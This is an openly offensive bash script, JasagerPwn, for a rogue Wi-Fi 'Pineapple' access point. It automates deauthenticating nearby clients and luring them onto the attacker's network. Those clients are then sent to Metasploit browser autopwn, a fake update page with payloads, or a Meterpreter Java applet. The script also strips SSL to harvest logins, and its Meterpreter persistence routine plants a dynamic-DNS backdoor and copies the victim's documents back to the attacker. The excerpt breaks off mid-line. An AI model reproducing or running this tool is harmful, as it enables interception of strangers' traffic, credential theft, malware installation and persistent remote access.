jasagerPwn-1.1-r44 #!/bin/bash #leg3nd's JasagerPwn Attack - v1.1 - rev44 #ATTACKS - browserPwn - Redirect LAN to Metasloits auxillary module browser autoPwn for sessions # - FakeUpdate - Redirect LAN to fake update page with metasploit payload download. # - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET. # - Sniffer - Justs picks up traffic with no ARP posioning, and perfect ssl stripping # - DeAuth - Deauths nearby clients from their APs and try to make them join yours # #Allows control of transparency of all attacks via built in bash menu. # Reqires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite # Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger. # # Created for and tested with an RTL8187 monitor mode card, and a open-WRT Fon+ (Pineapple). # For More Information refer to INSTALL_HOWTO, usage information -h / -? #SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION IFACE="usb0" #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc WiFiMODE="0" #Use WiFi For Internet Gateway (Will create a DeAuth Rule so you dont own yourself) EG 0,1 fonIP="192.168.10.2" #Fon router Iface IP, this is HARDCODED to 192.168.10.0 subnet. FONIFACE="eth0" #Interface facing the Jasager router WIFACE="wlan0" #Wireless Interface, EG wlan0,ath0,wifi0 MIFACE="mon0" #Monitor Interface for Attacks #Macchanger, ONLY FOR ATTACK INTERFACES macMode="set" #Mac spoofing mode - set / random (case sensitive) fakeMac="00:e0:f7:99:e1:30" # 00:e0:f7:99:e1:30 (Cisco Systems, Inc.) lawl ourAPmac="00:12:CF:A4:92:B1" #Pineapple MAC so we dont DeAuth Ourselves! msfpath="/pentest/exploits/framework3" #Metasploit Location (if not BT4, use msf3 directory) SETpath="/pentest/exploits/SET" #Social Engineering Toolkit Location DomainName="Networking.com" #Domain name for DHCP configuration. ###################################################################################################################### #Funcion can be used to customize post-exploit meterpreter script. this steals documents and adds a backdoor. #This slightly modified persistence script supports D-DNS tracking (like dyndns.org or no-ip) autoMetScript="0" #Allows you to automaticlly run a meterpreter persistence script on the victim. Pport="31337" # persistence backdoor port PersIP="Your.dyndns.com" # Your dyndns or no-ip for backdoors pwd=`echo $PWD` function metScript(){ if [ -e "$SETpath/src/program_junk/multi_meter.file" ] ; then rm "$SETpath/src/program_junk/multi_meter.file" ; fi # EDIT METERPRETER SCRIPT BELOW THIS echo -e "persistence_dns -r $PersIP -p $Pport -i 60 -X -A file_collector -d c:\\Users\\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files file_collector -i /tmp/files -l $pwd/collected__$NOW " > $SETpath/src/program_junk/multi_meter.file } ####END SCRIPT CONFIG###### #==================================================================================================================== ##################################################################################################################### while getopts "a:p:i:w:m:s:d:h:?uU" OPTIONS; do case ${OPTIONS} in a ) autoMetScript=$OPTARG ;; p ) Pport=$OPTARG ;; d ) WiFiMODE=$OPTARG ;; i ) IFACE=$OPTARG ;; w ) WIFACE=$OPTARG ;; h ) help ;; m ) macMode=$OPTARG ;; s ) fakeMac=$OPTARG ;; u ) update ;; U ) Fupdate ;; ? ) help ;; * ) echo -e "\e[01;31m[!]\e[00m Error: Unknown Switch Option" 1>&2 ;; # Default esac done #SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE #REQUIRED CHECKS FOR FUNCTIONALITY version="1.1" rev="44" Fwww="/var/www/fakeupdate" Jwww="/var/www/javapwn" Gwww="/var/www/google" gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'` IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'` NOW=$(date +"%b-%d_%H:%m:%S") sslport="11000" SPWD=`echo $PWD` javasite="1" sniffing="0" wasSniffing="0" fakeupdate="0" browserpwn="0" javaATK="0" z="1" moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` ourIP=`ifconfig $FONIFACE | awk '/inet addr/ {split ($2,A,":"); print A[2]}'` wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` googleRev=`wget -qO- "http://jasager-pwn.googlecode.com/svn/trunk/" | grep "jasager-pwn - Revision" | awk -F " " '{split ($4,A,":"); print A[1]}'` trap 'cleanup' 2 # Interrupt - "Ctrl + C" #----------------------------------------------------------------------- function help() { #help echo " (C)opyright 2011 leg3nd @ www.info-s3curity.com Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55] -p [31337] -a [0/1] -w [interface] Options: -a [0/1] : Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript -p [31337] : Auto-Run Scripts persistence Port. Current = $Pport -i [interface] : Internet Gateway Interface. Current = $IFACE -w [interface] : WiFi Card Interface. Current = $WIFACE -d [0/1] : WiFi Gateway Mode - Adds DeAuth Rule For Yourself = $WiFiMODE -m [random/set] : Change the Attack Interfaces MAC Address. Current = $macMode -s [MAC] : Use this MAC Address. Requires -m. Current = $fakeMac -u : Update script and its resources from Google Code. -U : Update script, SET, and Metasploit. -? / -h : Help Screen and Switches. More Information In top of script. For Installation, setup, and more information, please reference the INSTALL file or http://www.hak5.org/forums/index.php?showtopic=19955 " exit 1 } function IPTABLES(){ xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F" iptables -P FORWARD ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i $FONIFACE -o $IFACE -m state --state NEW -j ACCEPT if [ $gatewayIP ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp --dport 53 -j DNAT --to $gatewayIP ; fi iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE #check for sslstrip #if [ $sniffing -eq 1 ]; then #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport #iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port $sslport #fi ifconfig $FONIFACE $fonIP } function ipTableRedirect { xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F" sleep 1 if [ $sniffing -eq "1" ] ; then #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport #iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port 80 xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" & wasSniffing=$sniffing sniffing="0" fi iptables -P FORWARD ACCEPT iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $fonIP iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT iptables --table nat --append PREROUTING --in-interface $FONIFACE #redirect all traffic to us #iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT ifconfig $FONIFACE $fonIP } #Script update via google code function update(){ if [ ! $googleRev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.." exit 1 elif [ $googleRev -lt $rev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.." exit 1 elif [ $googleRev -gt $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..." wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh" #FakeUpdate for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi done #JavaPwn for Jitems in "index.template" "index.template.plain" ; do if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi done for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi done #Google for Gitems in "index.template" ; do if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi done for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi done elif [ $googleRev -eq $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!" fi echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!" exit 1 } #Full update including MSF/SET function Fupdate(){ echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating Metasploit.." xterm -fg green -bg black -geometry 75x20+0+0 -T "JasagerPwn v$version rev$googleRev - Metaploit Update" -e "cd $msfpath && ./msfupdate" echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating SET.." xterm -fg green -bg black -geometry 75x20-0+0 -T "JasagerPwn v$version rev$googleRev - SET Update" -e "cd $SETpath && python set-update" if [ ! $googleRev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.." exit 1 elif [ $googleRev -lt $rev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.." exit 1 elif [ $googleRev -gt $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..." wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh" #FakeUpdate for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi done #JavaPwn for Jitems in "index.template" "index.template.plain" ; do if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi done for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi done #Google for Gitems in "index.template" ; do if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi done for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi done elif [ $googleRev -eq $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!" fi echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!" exit 1 } #Parse that messy SSLstrip.log SSLparse(){ if [ -e "/$PWD/sslstrip.log" ]; then LOGPATH="/$PWD/sslstrip.log" DEFS="cred-collector/definitions.sslstrip" # NUMLINES=$(cat "$DEFS" | wc -l) i=1 while [ $i -le $NUMLINES ]; do VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS") VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS") VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS") VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS") GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)" if [ "$GREPSTR" ]; then echo -n "$VAL1" "- " >> /$PWD/cred-collector/ssl-collection.log echo "$GREPSTR" | \ sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/cred-collector/ssl-collection.log fi i=$[$i+1] done fi } #function for fluid use of both SET templates function JavaSite(){ GoogCheck=`cat $SETpath/config/set_config | grep "APACHE_DIRECTORY=/var/www/javapwn"` #1 = google 2 = java required if [ "$javasite" -eq "1" ] && [ "$GoogCheck" = "APACHE_DIRECTORY=/var/www/javapwn" ]; then sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!' $SETpath/config/set_config > $SETpath/config/set_configJ sleep 1 mv $SETpath/config/set_configJ $SETpath/config/set_config elif [ "$javasite" -eq "2" ]; then sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!' $SETpath/config/set_config > $SETpath/config/set_configG sleep 1 mv $SETpath/config/set_configG $SETpath/config/set_config fi } function sslstrip(){ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" & if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` sniffing="1" wasSniffing=$sniffing } function cleanup() { echo echo -e "\e[01;32m[>]\e[00m Cleaning up..." if [ $z = 1 ]; then SSLparse && sleep 1 if test -e /tmp/dhcpd.conf; then rm /tmp/dhcpd.conf; fi xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "killall -9 driftnet" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Apache" -e "/etc/init.d/apache2 stop" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $DNSID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Dsniff" -e "kill $dsniffID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" & #xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSL Parsing" -e "kill $parseID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DHCP" -e "kill $messageID" & xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Killing DeAuth Attacks" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID" & #xterm -geometry 75x7+10+330 -T "[leg3nd-BrowserPwn] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DHCP3" -e "/etc/init.d/dhcp3-server stop" xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 urlsnarf" xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 dsniff" xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -F" & xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -X" & #Clean up our cfgs if test -e dsniff*; then rm dsniff*; fi if [ -e "/$PWD/dsniff.services" ]; then rm "/$PWD/dsniff.services" ; fi if [ -e *.png ]; then rm *.png ; fi if [ -d "$SETpath/src/html/templates/java/temp/" ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi if [ -d "$SETpath/src/html/templates/google/temp/" ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi if [ -e "$SETpath/src/html/templates/java/index.template" ] && [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ]; then mv "$SETpath/src/html/templates/java/index.template.ORIGINAL" "$SETpath/src/html/templates/java/index.template" fi APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"` if [ -e "$SETpath/src/html/templates/google/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi if [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi if [ -e "$SETpath/config/set_config.ORIGINAL" ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi if [ -e "/etc/dhcp3/dhcpd.conf" ] && [ -e "/etc/dhcp3/dhcpd.conf.ORIGINAL" ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi if [ -e "/etc/resolv.conf" ] && [ -e "/etc/resolv.conf.ORIGINAL" ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi if test -e /tmp/auto-java2; then rm /tmp/auto-java2; fi if test -e sslstrip.log; then mv sslstrip.log /$PWD/cred-collector/$NOW-sslstrip.log; fi xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Self" -e "killall -9 jasagerPwn" & fi echo -e "\e[01;36m[~]\e[00m Exiting with elegance.." exit 0 } #xterm -geometry 75x8+100+0 -e "ifconfig $WIFACE up && sleep 2" ifconfig $WIFACE up && sleep 1 gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'` IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'` ifconfig $FONIFACE $fonIP #xterm -geometry 0x0+0+0 -e "while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done" & #make sure our IP doesnt get screwy from any dhcp.. while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done & ipID=`echo $!` gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` #check for required interfaces if [ "$WIFcheck" != "$WIFACE" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE..." && exit 0 fi if [ "$IFcheck" != "$IFACE" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE..." && exit 0 fi #----------------------------------------------------------------------- clear echo echo echo ' __------__' echo ' /~ ~\' echo ' | //^\//^\| Lets get this show on the road!!' echo " /~~\ || o| |o|:~\ #! JasagerPwn MultiAttack v$version" echo ' | |6 ||___|_|_||:| / By leg3nd @ info-s3curity.com' echo " \__. / o \/ / rev$rev" echo ' | ( O ) [!] Use At your Own Risk [!]' echo ' /~~~~\ `\ \ /' echo ' | |~~\ | ) ~------~`\' echo ' / | | | / ____ /~~~)\' echo ' (_/ | | | /. | ( |' echo ' | | | \ / __)/ \' echo ' \ \ \ \/ /- \ `\' echo ' \ \|\ / | |\___|' echo ' \ | \____/ | |' echo ' /^~> \ _/ <' echo ' | | \ \' echo ' | | \ \ \' echo ' -^-\ \ | )' echo ' `\_______/^\______/' echo echo echo -e "\e[01;32m[>]\e[00m Stopping services and programs..." #xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'Stopping airmon-ng Interfaces'" -e "airmon-ng stop $MIFACE" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'DHCP3 Service'" -e "/etc/init.d/dhcp3-server stop" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Sniffing Apps" -e "killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DNS Spoof" -e "killall -9 dnsspoof" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 wicd" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "/etc/init.d/wicd stop" & sleep 1 echo -e "\e[01;32m[>]\e[00m Checking Environment..." #test for injection - too glitchy so just got rid of it.. #injection=`aireplay-ng --test $MIFACE -i $MIFACE | sed -n -e ''3'p' | awk '{ print $2, $3, $4 }' | cut -b 1-20` #if [ "$injection" != "Injection is working" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: $MIFACE Packet Injection Failed.. Try again, or Re-plug it in." && cleanup ; fi #Check for root if [ "$(id -u)" != "0" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Not Root.." && cleanup ; fi # Check for dependencies, if not install them #Dependencies checks dhcp3check=`dpkg -l | grep dhcp3-server | awk '{print $2}' | head -n 1` apache2check=`dpkg -l | grep apache2 | awk '{print $2}' | head -n 1` apache2phpcheck=`dpkg -l | grep "libapache2-mod-php5" | awk '{print $2}' | head -n 1` dsniffcheck=`dpkg -l | grep dsniff | awk '{print $2}' | head -n 1` php5check=`dpkg -l | grep php5 | awk '{print $2}' | head -n 1` macchangerCheck=`dpkg -l | grep macchanger | awk '{print $2}' | head -n 1` aircrackCheck=`dpkg -l | grep aircrack | awk '{print $2}' | head -n 1` sleep 1 if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $php5check ] || [ ! $macchangerCheck ] || [ ! $aircrackCheck ] || [ ! -e "/usr/bin/airdrop-ng" ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo elif [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo fi # dhcp3-server check if [ ! $dhcp3check ]; then echo -e "\e[01;31m[!]\e[00m No dhcp3-server was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove" fi # dsniff check if [ ! $dsniffcheck ]; then echo -e "\e[01;31m[!]\e[00m No Dsniff suite was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dsniff" fi # apache2 check if [ ! $apache2check ]; then echo -e "\e[01;31m[!]\e[00m No apache2 server was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install apache2 && update-rc.d -f apache2 remove" elif [ ! $apache2phpcheck ]; then echo -e "\e[01;31m[!]\e[00m No apache2 PHP5 module was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install libapache2-mod-php5" fi # php5 check if [ ! $php5check ]; then echo -e "\e[01;31m[!]\e[00m No PHP5 was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install php5 php5-curl" fi # macchanger check if [ ! $macchangerCheck ]; then echo -e "\e[01;31m[!]\e[00m No Macchanger was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install macchanger" fi # aircrack-ng check if [ ! $aircrackCheck ] && [ ! -e "/usr/local/bin/aircrack-ng" ]; then echo -e "\e[01;31m[!]\e[00m No Aircrack-ng suite was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install aircrack-ng" fi #sslstrip check if [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install twisted-web linux-headers-`uname -r` build-essential gcc g++" wget -q -P "/tmp" http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz tar xf /tmp/sslstrip-0.8.tar.gz -C "/tmp/" chmod +x /tmp/sslstrip-0.8/setup.py xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /tmp/sslstrip-0.8/setup.py install" if [ -d "/tmp/sslstrip-0.8/" ]; then rm -rf /tmp/sslstrip-0.8/ ; fi fi #airdrop-ng check if [ ! -e "/usr/bin/airdrop-ng" ]; then if [ -e "/pentest/wireless/airdrop-ng/install.py" ]; then xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install python2.6 python2.6-dev python-psyco" chmod +x /pentest/wireless/airdrop-ng/install.py xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /pentest/wireless/airdrop-ng/install.py" xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "airdrop-ng -u OUIUPDATE" else echo -e "\e[01;31m[!]\e[00m ERROR: Cant Find Airdrop-ng Installer.. Do it manually." fi fi #metasploit check if [ ! -e "$msfpath/msfconsole" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: "$msfpath"" && echo && cleanup; fi #SET check if [ ! -e "$SETpath/set-automate" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: "$SETpath"" && echo && cleanup else # python pefile module - thanks redmeat_uk if [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then echo -e "\e[01;31m[!]\e[00m No Python PEfile module was detected... Installing.." if [ -e "/tmp/pefile-1.2.10-102.tar.gz" ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi wget -q -P "/tmp" http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/ mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/ chmod +x $SETpath/src/payloadgen/pefile.py if [ 